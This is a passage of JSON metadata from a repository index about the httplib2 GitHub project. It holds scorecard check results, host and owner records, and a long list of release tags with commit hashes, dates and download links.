vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttpli